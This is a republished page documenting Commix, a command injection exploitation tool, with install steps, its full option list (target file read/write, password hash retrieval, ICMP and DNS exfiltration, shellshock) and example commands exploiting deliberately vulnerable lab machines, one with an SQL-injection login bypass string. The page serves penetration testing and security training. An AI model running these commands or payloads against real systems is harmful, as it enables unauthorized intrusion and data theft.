Commix - Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

Requirements

• Python 2.6.x or 2.7.x
• Linux/ Mac OS X/ Windows (experimental)

Installation

Download commix by cloning the Git repository:

  git clone http://ift.tt/2iPAE5V commix  

Commix comes packaged on the official repositories of the following Linux distributions so you can use the package manager to install it!

• ArchStrike
• BlackArch Linux
• BackBox
• Kali Linux
• Parrot Security OS
• Weakerthan Linux

Commix also comes as a plugin, on the following penetration testing frameworks:

• TrustedSec's Penetration Testers Framework (PTF)
• OWASP Offensive Web Testing Framework (OWTF)
• CTF-Tools
• PentestBox
• PenBox
• Katoolin
• Aptive's Penetration Testing tools
• Homebrew Tap - Pen Test Tools

Usage:

    python commix.py [option(s)]


  Options:
  -h, --help            Show help and exit.


  General:
    These options relate to general matters.


    -v VERBOSE          Verbosity level (0-4, Default: 0).

    --install           Install 'commix' to your system.

    --version           Show version number and exit.

    --update            Check for updates (apply if any) and exit.

    --output-dir=OUT..  Set custom output directory path.

    -s SESSION_FILE     Load session from a stored (.sqlite) file.

    --flush-session     Flush session files for current target.

    --ignore-session    Ignore results stored in session file.

    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.

    --batch             Never ask for user input, use the default behaviour.

    --charset=CHARSET   Force character encoding used for data retrieval.

    --check-internet    Check internet connection before assessing the target.


  Target:
    This options has to be provided, to define the target URL.


    -u URL, --url=URL   Target URL.

    --url-reload        Reload target URL after command execution.

    -l LOGFILE          Parse target from HTTP proxy log file.

    -m BULKFILE         Scan multiple targets given in a textual file.

    -r REQUESTFILE      Load HTTP request from a file.

    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,

                        Default: 0).

    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.


  Request:
    These options can be used to specify how to connect to the target URL.


    -d DATA, --data=..  Data string to be sent through POST.

    --host=HOST         HTTP Host header.

    --referer=REFERER   HTTP Referer header.

    --user-agent=AGENT  HTTP User-Agent header.

    --random-agent      Use a randomly selected HTTP User-Agent header.

    --param-del=PDEL    Set character for splitting parameter values.

    --cookie=COOKIE     HTTP Cookie header.

    --cookie-del=CDEL   Set character for splitting cookie values.

    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').

    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

    --proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').

    --tor               Use the Tor network.

    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).

    --tor-check         Check to see if Tor is used properly.

    --auth-url=AUTH_..  Login panel URL.

    --auth-data=AUTH..  Login parameters and data.

    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').

    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').

    --ignore-401        Ignore HTTP error 401 (Unauthorized).

    --force-ssl         Force usage of SSL/HTTPS.

    --ignore-redirects  Ignore redirection attempts.

    --retries=RETRIES   Retries when the connection timeouts (Default: 3).


  Enumeration:
    These options can be used to enumerate the target host.


    --all               Retrieve everything.

    --current-user      Retrieve current user name.

    --hostname          Retrieve current hostname.

    --is-root           Check if the current user have root privileges.

    --is-admin          Check if the current user have admin privileges.

    --sys-info          Retrieve system information.

    --users             Retrieve system users.

    --passwords         Retrieve system users password hashes.

    --privileges        Retrieve system users privileges.

    --ps-version        Retrieve PowerShell's version number.


  File access:
    These options can be used to access files on the target host.


    --file-read=FILE..  Read a file from the target host.

    --file-write=FIL..  Write to a file on the target host.

    --file-upload=FI..  Upload a file on the target host.

    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.


  Modules:
    These options can be used increase the detection and/or injection

    capabilities.


    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.

                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

    --dns-server=DNS..  The 'DNS exfiltration' injection module.

                        (Domain name used for DNS exfiltration attack).

    --shellshock        The 'shellshock' injection module.


  Injection:
    These options can be used to specify which parameters to inject and to

    provide custom injection payloads.


    -p TEST_PARAMETER   Testable parameter(s).

    --skip=SKIP_PARA..  Skip testing for given parameter(s).

    --suffix=SUFFIX     Injection payload suffix string.

    --prefix=PREFIX     Injection payload prefix string.

    --technique=TECH    Specify injection technique(s) to use.

    --skip-technique..  Specify injection technique(s) to skip.

    --maxlen=MAXLEN     Set the max length of output for time-related

                        injection techniques (Default: 10000 chars).

    --delay=DELAY       Seconds to delay between each HTTP request.

    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).

    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.

    --web-root=WEB_R..  Set the web server document root directory (e.g.

                        '/var/www').

    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').

    --os-cmd=OS_CMD     Execute a single operating system command.

    --os=OS             Force back-end operating system (e.g. 'Windows' or

                        'Unix').

    --tamper=TAMPER     Use given script(s) for tampering injection data.

    --msf-path=MSF_P..  Set a local path where metasploit is installed.

    --backticks         Use backticks instead of "$()", for commands

                        substitution.


  Detection:
    These options can be used to customize the detection phase.


    --level=LEVEL       Level of tests to perform (1-3, Default: 1).

    --skip-calc         Skip the mathematic calculation during the detection

                        phase.

    --skip-empty        Skip testing the parameter(s) with empty value(s).

    --failed-tries=F..  Set a number of failed injection tries, in file-based

                        technique.


  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.

    --purge-output      Safely remove all content from output directory.

    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.

    --mobile            Imitate smartphone through HTTP User-Agent header.

    --offline           Work in offline mode.

    --wizard            Simple wizard interface for beginner users.

    --disable-coloring  Disable console output coloring.  

Examples:

• Exploiting Damn Vulnerable Web App:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zP5UtA
vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"  

• Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOjNbN
wizard/index.php?type=test" --prefix="'" --suffix="//"  

• Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPi9Xb
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=
127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"  

• Exploiting Persistence using ICMP exfiltration technique:

  root@kali:~/commix# python commix.py --url="http://ift.tt/1CpDUGG" 
--data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"  

• Exploiting Persistence using an alternative (python) shell:

  root@kali:~/commix# python commix.py --url="http://ift.tt/1CpDUGG"
--data="addr=127.0.0.1" --alter-shell="Python"  

• Exploiting Kioptrix: Level 1.1 (#2):

  root@kali:~/commix# python commix.py --url="http://ift.tt/1J4CGsD" 
--data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"  

• Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPi7i6
drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"  

• Exploiting CVE-2014-6271/Shellshock:

  root@kali:~/commix# python commix.py --url="http://ift.tt/1DkAzun" 
--shellshock  

• Exploiting commix-testbed (cookie) using cookie-based injection:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPfkoY
scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"  

• Exploiting commix-testbed (user-agent) using ua-based injection:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOE0hp
scenarios/user-agent/ua(blind).php" --level=3  

• Exploiting commix-testbed (referer) using referer-based injection:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOE0hp
scenarios/referer/referer(classic).php" --level=3  

• Exploiting Flick 2 using custom headers and base64 encoding option:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2pWQioj" 
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64  

• Exploiting commix-testbed (JSON-based) using JSON POST data:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2CaCdt7
scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'  

• Exploiting SickOs 1.1 using shellshock module and HTTP proxy:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2Eg3l7l" 
--shellshock --proxy="192.168.2.8:3128"  

Download Commix

You might also like:

• 14 Best IP Hide Tools 2017
• JBrute - An Open Source Security Tool To Audit Hashed Passwords
• ThreatFactor NSIA - An Open Source Website Scanner
• Iodine - Tunnelling IPv4 Traffic Over DNS
• Kvasir - Penetration Testing Data Management Tool
• PoshSec Framework - Graphical Interface For Powershell Scripts, Modules, & Cmdlets
• NetStalker - Rule-Based Network Traffic Monitoring & Filtering Tool
• FruityWiFi - Wireless Network Auditing Tool
• AxCrypt - File Encryption Software For Windows
• Ghiro - Automated Digital Image Forensics Tool
• Mellivora - A CTF (Capture The Flag) Engine
• DDoS Deflate - Shell Script For Blocking DDoS Attacks
• Bluebox-ng - VoIP Penetration Testing Framework
• wEAPe - Wireless EAP Extractor
• Broken Web Applications Project - A Virtual Machine For Web Application Security Researchers
• SpearPhisher - Web Application To Send and Track Spear Phishing Campaigns
• OS X Auditor - Mac Forensics Tool
• SSLNuke - Tool For Intercepting & Decrypting Secure IRC Traffic
• Capture The Flag - A Security Wargame
• Binrev - Automate Reversing Windows Binaries For Pentesters
• x64dbg - An Open Source x64/x32 Debugger For Windows

from Effect Hacking full article here